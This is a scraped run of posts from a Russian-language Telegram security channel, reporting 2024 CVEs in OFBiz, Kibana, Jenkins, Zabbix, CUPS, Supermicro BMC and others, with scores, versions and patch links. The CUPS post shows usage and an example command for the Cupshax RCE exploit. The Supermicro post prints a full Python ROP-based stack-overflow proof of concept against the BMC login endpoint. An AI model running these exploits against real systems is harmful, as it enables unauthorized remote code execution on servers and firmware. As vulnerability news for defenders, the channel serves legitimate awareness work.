SecuriXy.kz
9.36K subscribers
483 photos
22 videos
18 files
393 links
Все самое интересное из мира информ. безопасности и IT 👍🏻
Обсуждаем, делимся, умнеем
https://securixy.kz

Обратная связь - @feedback_securixy_bot

Хахатушки - @memekatz
Hack the Box RUS - @HTB_RUS
Download Telegram
Снова Apache #OFBiz ERP #RCE #CVE-2024-38856

Коренная причина уязвимости кроется в недостатках механизма аутентификации

CVSS score of 9.8 / 10.0.

Она затрагивает Apache OFBiz все версии до 18.12.15.

https://thehackernews.com/2024/08/new-zero-day-flaw-in-apache-ofbiz-erp.html

Big thanks Aman for news
#Kibana 8.14.2 / 7.17.23 arbitrary code execution via prototype pollution (ESA-2024-22)

Эта проблема затрагивает экземпляры Kibana, запущенные на Elastic Cloud, но RCE ограничено внутри контейнера Kibana Docker. Дальнейшая эксплуатация, например выход из контейнера, предотвращается с помощью seccomp-bpf и профилей AppArmor.

Affected Versions:
Kibana 8.x < versions prior to 8.14.2 and Kibana 7.x < versions prior to 7.17.23

Solutions and Mitigations:
Users should upgrade to version 8.14.2 and 7.17.23.

Severity: CVSSv3: 9.9(Critical) - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H 108

CVE ID: #CVE-2024-37287

https://discuss.elastic.co/t/kibana-8-14-2-7-17-23-security-update-esa-2024-22/364424
#Roundcube #CVE-2024-42009 и #CVE-2024-42008 - обе ошибки XSS. Первая позволяет удаленному злоумышленнику украсть и отправить электронную почту жертвы через поддельное сообщение, вторая - через вредоносное вложение.

Severity: еще не выдана оценка

Третяя #CVE-2024-42010 - позволяет использовать недостаточно отфильтрованные последовательности маркеров Cascading Style Sheets (CSS) в отрисованных почтовых сообщениях, что позволяет удаленному злоумышленнику получить конфиденциальную информацию.

Severity: High 7.5/ 10

https://github.com/roundcube/roundcubemail/releases

Кто юзает обновляйтесь
Снова Jenkins

#CVE-2024-43044 | #CVE-2024-43045 Critical Jenkins Vulnerability Exposes Servers to RCE Attacks

Jenkins 2.470, LTS 2.452.3 и более ранние версии позволяют процессам агента читать произвольные файлы из файловой системы контроллера Jenkins с помощью метода `ClassLoaderProxy#fetchJar` в библиотеке Remoting.

CVSS Score : 9.1

Обновите до версии LTS 2.452.3 и 2.470 и выше

https://www.jenkins.io/security/advisory/2024-08-07/

https://github.com/advisories/GHSA-h856-ffvv-xvr4
#CVE-2024-22116 Critical RCE в Zabbix Monitoring Solution

An administrator with restricted permissions can exploit the lack of default escaping for script parameters.

CVSS 9.9

The vulnerability affects the following versions of Zabbix:
6.4.0 to 6.4.15
7.0.0alpha1 to 7.0.0rc2

Zabbix has addressed this issue in the following fixed versions:
6.4.16rc1
7.0.0rc3

https://support.zabbix.com/browse/ZBX-25016
Критическая уязвимость TCP/IP #CVE-2024-38063 от 13 августа 2024 обзавелась первым PoC'ом. Пусть это и приводит к крашу ipv6 через flask питона, но уже есть над чем работать.

Форкнул себе на всякий случай
https://github.com/cleverg0d/CVE-2024-38063-POC
Уязвимость #CVE-2024-8698 в #Keycloak подвергает риску аутентификацию SAML (keycloak-saml-core)

CVSS v3: 7.7

https://nvd.nist.gov/vuln/detail/CVE-2024-8698

Патч вышел https://github.com/keycloak/keycloak/releases/tag/25.0.6
В ядре Linux найден #LPE #CVE-2024-26808 и #CVE-2024-1085 -

Уязвимости вызваны обращением к уже освобождённой области памяти в функциях nft_chain_filter и nft_setelem_catchall_deactivate в подсистеме netfilter и позволяют добиться выполнения кода с правами root.

Для проведения атаки требуется наличие доступа к nftables, который можно получить при наличии прав CAP_NET_ADMIN в любом пространстве имён идентификаторов пользователей (user namespace) или сетевом пространстве имён (network namespace), предоставляемых, например, в изолированных контейнерах.

Устранены в обновлениях ядер 5.10.210, 5.15.149, 6.1.76, 6.6.15, 6.7.3 и 6.8, и уже в основных дистрибутивах (Debian, Ubuntu, RHEL, SUSE, Fedora).

PoC: https://github.com/google/security-research/tree/master/pocs/linux/kernelctf/CVE-2024-26808_cos/exploit/cos-105-17412.294.36
Forwarded from Похек (Сергей Зыбнев)
This media is not supported in your browser
VIEW IN TELEGRAM
🐧 Cupshax - RCE через службу печати в UNIX
#unix #RCE #CVE

CVE-2024-47176 CVE-2024-47076 CVE-2024-47175 CVE-2024-47177

Вчера вечером интернет наводнился новостью о новой баге в UNIX системах, которая позволяет выполнить неавторизованный RCE. Но были особые условия, к примеру что должна быть очередь на печать. В прикрепленном видосе демонстрируется PoC.

🛠 Изучить райтап ТУТ

Авторы эксплойта изучили коммит в OpenPrinting CUPS, в котором была исправлена бага и написали эксплойт. Он использует dns-sd обнаружение принтера, требуя, чтобы цель могла получить широковещательное сообщение, т.е. находилась в той же сети.

➡️Использование
usage: cupshax.py [-h] [--name NAME] --ip IP [--command COMMAND] [--port PORT]

A script for executing commands remotely

options:
-h, --help show this help message and exit
--name NAME The name to use (default: RCE Printer)
--ip IP The IP address of the machine running this script
--command COMMAND The command to execute (default: 'touch /tmp/pwn')
--port PORT The port to connect on (default: 8631)


➡️Пример использования
python cupshax.py --name "Print to PDF (Color)" \
--command "id>/tmp/pwn" \
--ip 10.0.0.3


📱 Github и мой форк, на случай удаления репы

🌚 @poxek | 📺 RuTube | 🌚 Мерч Похек
Please open Telegram to view this post
VIEW IN TELEGRAM
Мы знаем как админы не любят менять заводские пароли к админкам сереров типа iDrac, iLO и др. И вот вишинка #CVE-2024-36435
с CVSS 9.8 в прошивке BMC компании Supermicro в некоторых материнских платах X11, X12, H12, B12, X13, H13 и B13 (и модулях CMM6).

Неавторизованный пользователь может отправить в интерфейс поддельные данные, которые вызывают переполнение буфера стека и могут привести к произвольному RCE а на BMC.

https://www.binarly.io/blog/cve-2024-36435-deep-dive-the-years-most-critical-bmc-security-flaw

PoC:

# CVE-2024-36435 – Buffer overflow vulnerability in Supermicro BMC IPMI firmware due to unchecked length of user-supplied value

import base64
import requests

from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

# set target and command values
target = "https://192.168.10.53:443/cgi/login.cgi"
command = "touch /tmp/BRLY"

libc_base = 0x76283000 # we try to guess
gadget_1_offset = 0x000D8874 # pop {r0, r1, r2, r3, fp, pc};
gadget_2_offset = 0x001026D4 # mov r0, sp; blx r3;
system_offset = 0x0003C4D4

print(f"Target: {target}")
print(f"Command: {command}")
print()
print(f"libc_base: {libc_base:#x}")
print(f"gadget_1_offset: {gadget_1_offset:#x}")
print(f"gadget_2_offset: {gadget_2_offset:#x}")
print(f"system_offset: {system_offset:#x}")
print()


payload = base64.b64encode(
b"\x00" * 456
+ int.to_bytes(libc_base + gadget_1_offset, 4, "little") # gadget_1
+ b"\x00" * 12
+ int.to_bytes(libc_base + system_offset, 4, "little") # system
+ b"\x00" * 4
+ int.to_bytes(libc_base + gadget_2_offset, 4, "little") # gadget_2
+ command.encode()
).decode()

data = f"name={payload}&pwd=&check=1"

print("Sending requests...")
i = 0
while True:
print(f"Request: '{i}'")
r = requests.post(target, data=data, verify=False)
i += 1
Forwarded from APT
This media is not supported in your browser
VIEW IN TELEGRAM
💻 Exploiting Windows Kernel via Kernel Streaming Proxying

An in-depth look at CVE-2024-30090, a vulnerability in Kernel Streaming, allowing privilege escalation via malformed IOCTL requests. By leveraging KS Event mishandling during 32-bit to 64-bit conversions, can exploit the bug pattern to gain arbitrary kernel mode access.

🔗 Research:
Proxying to Kernel - Part I
Proxying to Kernel - Part II

🔗 Source:
https://github.com/Dor00tkit/CVE-2024-30090

#windows #streaming #kernel #cve #poc
Please open Telegram to view this post
VIEW IN TELEGRAM
Критическая уязвимость #CVE-2024-21216 в Oracle #WebLogic Server - Позволяет неаутентифицированному злоумышленнику, имеющему доступ к сети через T3 и IIOP привести к полному захвату сервера.

CVSS 3.1 Score: 9.8
Уязвимы версии: с 12.2.1.4.0 по 14.1.1.0.0

https://github.com/advisories/GHSA-r389-865g-hcg3